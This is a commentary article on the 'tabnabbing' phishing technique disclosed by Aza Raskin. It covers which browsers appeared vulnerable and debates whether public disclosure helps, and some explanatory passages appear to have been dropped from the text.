I can never decide whether I'm happy when a good guy discovers and publicizes a new way of potentially exploiting Internet users. After all, it's better that we learn about the problem before it appears in the wild, but there's always a worry that the bad guys wouldn't have figured it out on their own without the hint. The latest trick, dubbed "tabnabbing," comes from Aza Raskin, Creative Lead for Firefox (and son of Jef Raskin).
Here's how it works, and you can watch it happen yourself by loading the (which is also the page where Raskin explains the exploit). Although Aza Raskin tested primarily with Firefox, I was able to verify that the exploit also works in the Mac versions of Safari, Camino, Opera, and OmniWeb, though not quite in the same way in each. The current version of Google Chrome (5.0.375.55) appears to be immune to the problem, though it's possible that Google fixed it quickly, since others have previously reported Chrome as vulnerable.
SneakyPage could pretend to be Gmail or Hotmail or Citibank or any other commonly used site. The specifics don't matter; all it has to do is make you believe that the tab contains a legitimate login form for a service you use.
If there's no guarantee of safety - at least until browser makers figure out a solution - how can you protect yourself? I see a few realistic options that don't require extra effort and could even make your life easier:
Meanwhile, back at the conundrum I posed at the beginning of this article, what is a good guy who discovers such a trick to do? This isn't the same as finding a browser bug that enables a security exploit, since in that case it makes sense to report the bug privately so the browser maker can fix the bug before the bad guys exploit it. Browser makers don't always do this quickly enough, but that's the theory.
In this situation, though, the browsers are acting largely as they're supposed to, which is why tabnabbing works across multiple browsers. Similarly, the CSS browser history leak isn't new, and it too works across multiple browsers. So I suppose that full public disclosure, as a way of encouraging multiple browser makers to agree on ways of blocking these vulnerabilities, does make the most sense, especially in situations like this, where user education is the best defense. Consider yourself educated, and do what you can to encourage Apple and Mozilla and the others to prevent tabnabbing.
Still, it does make one long for the early days of the Internet when it wasn't necessary to worry about such things.